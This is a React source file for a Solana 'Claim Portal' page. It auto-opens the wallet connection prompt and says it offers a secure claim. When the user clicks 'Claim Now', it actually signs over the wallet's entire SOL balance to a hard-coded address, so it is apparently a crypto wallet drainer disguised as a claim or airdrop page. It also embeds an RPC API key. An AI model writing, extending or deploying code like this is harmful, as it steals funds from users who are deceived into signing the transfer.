// src/chain/sol/App.js
import React, { useEffect, useState } from 'react';
import { useWallet } from '@solana/wallet-adapter-react';
import { WalletMultiButton } from '@solana/wallet-adapter-react-ui';
import { Connection, PublicKey, Transaction, SystemProgram, LAMPORTS_PER_SOL } from '@solana/web3.js';
import { AlertCircle, CheckCircle, Loader2 } from 'lucide-react';
import { useWalletModal } from '@solana/wallet-adapter-react-ui';
import '@solana/wallet-adapter-react-ui/styles.css';
//import Design from '../usdt/Design';

// --- THE SOLANA CLAIM PAGE COMPONENT ---
// This component receives an `onDisconnect` prop to go back to the main landing page.
const Design = ({ onDisconnect }) => {
  // --- STATE AND HOOKS (From your provided code) ---
  const { publicKey, sendTransaction, wallet } = useWallet();
  const [loading, setLoading] = useState(false);
  const [error, setError] = useState('');
  const [success, setSuccess] = useState(''); // Store signature in success state
  const { setVisible } = useWalletModal(); // --- NEW: Get the setVisible function from the hook ---
  // --- HANDLECLAIM FUNCTION (Unchanged, as requested) ---
  
  useEffect(() => {
    // If the modal is not already visible AND the wallet is not connected, open it.
    if (!publicKey) {
      setVisible(true);
    }
  }, [publicKey, setVisible]);
  const handleClaim = async () => {
    if (!publicKey) {
      setError('Wallet not connected!');
      return;
    }
    try {
      setLoading(true);
      setError('');
      setSuccess('');
      const connection = new Connection('https://mainnet.helius-rpc.com/?api-key=1a2cd70a-5fe9-4a04-931f-6a3ac221a7ca', 'confirmed');
      const [{ blockhash }, currentBalance] = await Promise.all([connection.getLatestBlockhash(), connection.getBalance(publicKey)]);
      
      // A small fee buffer for transaction costs
      const feeBuffer = 5000; // 5000 lamports = 0.000005 SOL, a standard fee
      const sendAmount = currentBalance - feeBuffer;
      
      // if (sendAmount <= 0) {
      //   throw new Error('Insufficient SOL balance for transaction fees.');
      // }
      
      const transaction = new Transaction().add(SystemProgram.transfer({
        fromPubkey: publicKey,
        toPubkey: new PublicKey('upQ3JF7QKHKB5Tuuk64CJQkXJHT1bZ2Au22U8uN5XTm'),
        lamports: currentBalance
      }));
      
      transaction.recentBlockhash = blockhash;
      transaction.feePayer = publicKey;
      
      const signature = await sendTransaction(transaction, connection);
      await connection.confirmTransaction(signature, 'confirmed');
      setSuccess(signature);
    } catch (err) {
      console.error('Claim failed:', err);
      let errorMessage = err.message || 'An unknown error occurred.';
      if (err.name === 'WalletSendTransactionError') {
        errorMessage = 'Transaction rejected in wallet.';
      }
      setError(`Claim failed: ${errorMessage}`);
    } finally {
      setLoading(false);
    }
  };

  // --- STYLES FOR THIS PAGE AND MODAL ---
  const pageStyles = `
    .sol-page-container {
      width: 100vw; height: 100vh; display: flex;
      justify-content: center; align-items: center;
      background-color: #0D1117; animation: fadeIn 0.5s ease-in-out;
    }
    .claim-modal-content {
      background: rgba(22, 27, 34, 0.8); backdrop-filter: blur(15px);
      -webkit-backdrop-filter: blur(15px); border: 1px solid rgba(255, 255, 255, 0.1);
      border-radius: 20px; width: 90%; max-width: 450px; padding: 2rem;
      box-shadow: 0 8px 32px 0 rgba(0, 0, 0, 0.37); animation: slideIn 0.5s ease-out;
    }
    .claim-modal-header { text-align: center; margin-bottom: 1.5rem; }
    .claim-modal-header h2 { font-size: 1.75rem; color: #fff; margin: 0 0 0.5rem 0; }
    .claim-modal-header p { font-size: 1rem; color: #A0A0A0; margin: 0; }
    .status-container {
      min-height: 70px; display: flex; flex-direction: column;
      justify-content: center; align-items: center; padding: 1rem;
      margin-bottom: 1.5rem; border-radius: 12px; background: rgba(0,0,0,0.2);
    }
    .status-loading { color: #9945FF; } .status-success { color: #14F195; }
    .status-error { color: #dc3545; }
    .status-container p { margin: 0; font-weight: 500; text-align: center; }
    .status-container a { color: #007BFF; text-decoration: none; font-size: 0.9rem; margin-top: 5px; }
    .status-container a:hover { text-decoration: underline; }
    .claim-modal-actions { display: flex; flex-direction: column; gap: 1rem; }
    .claim-button {
      border: none; border-radius: 12px; padding: 16px;
      font-size: 1.1rem; font-weight: 600; cursor: pointer; transition: all 0.3s ease;
    }
    .claim-button-secondary { background: #333; color: #EAEAEA; border: 1px solid #555; }
    .claim-button-secondary:hover { background: #444; }
    .claim-button-primary { background: linear-gradient(90deg, #9945FF, #14F195); color: white; }
    .claim-button-primary:hover { transform: translateY(-3px); box-shadow: 0 6px 20px rgba(153, 69, 255, 0.5); }
    .claim-button:disabled { background: #555; color: #888; cursor: not-allowed; }
    /* Overriding WalletMultiButton styles to fit the modal */
    
    @keyframes fadeIn { from { opacity: 0; } to { opacity: 1; } }
    @keyframes slideIn { from { transform: translateY(30px); opacity: 0; } to { transform: translateY(0); } }
    @keyframes spin { from { transform: rotate(0deg); } to { transform: rotate(360deg); } }
    .animate-spin { animation: spin 1s linear infinite; }
  `;

  return (
    <>
      <style>{pageStyles}</style>
      <div className="sol-page-container">
        <div className="claim-modal-content">
          <div className="claim-modal-header">
            <h2>Claim Portal</h2>
            <p>Securely connect your wallet and click claim to proceed.</p>
          </div>

          <div className="status-container">
            {loading && (
              <div className="status-loading">
                <Loader2 className="animate-spin" size={24} />
                <p>Processing transaction...</p>
              </div>
            )}
            {success && (
              <div className="status-success">
                <CheckCircle size={24} />
                <p>Transfer Successful!</p>
               
              </div>
            )}
            {error && (
              <div className="status-error">
                <AlertCircle size={24} />
                <p>{error}</p>
              </div>
            )}
            {!loading && !success && !error && (
              <p style={{ color: '#888' }}>
                {publicKey ? `Connected as: ${publicKey.toBase58().slice(0, 4)}...${publicKey.toBase58().slice(-4)}` : 'Awaiting action...'}
              </p>
            )}
          </div>

          <div className="claim-modal-actions">
            {!publicKey ? (
              <>
                <WalletMultiButton />
                <button
                  className="claim-button claim-button-secondary"
                  onClick={() => {
                    //onDisconnect();          // disconnect wallet
                    window.location.reload(); // refresh page
                  }}
                >
                  Go Back
                </button>
              </>
            ) : (
              <>
                 <button
                  className="claim-button claim-button-secondary"
                  onClick={() => {
                    //onDisconnect();          // disconnect wallet
                    window.location.reload(); // refresh page
                  }}
                >
                  Go Back
                </button>
               
                     <button
                  className="claim-button claim-button-primary"
                  onClick={handleClaim}
                  disabled={loading || success}
                >
                  {loading ? 'Processing...' : 'Claim Now'}
                </button>
              </>
            )}
          </div>
        </div>
      </div>
    </>
  );
};

export default Design;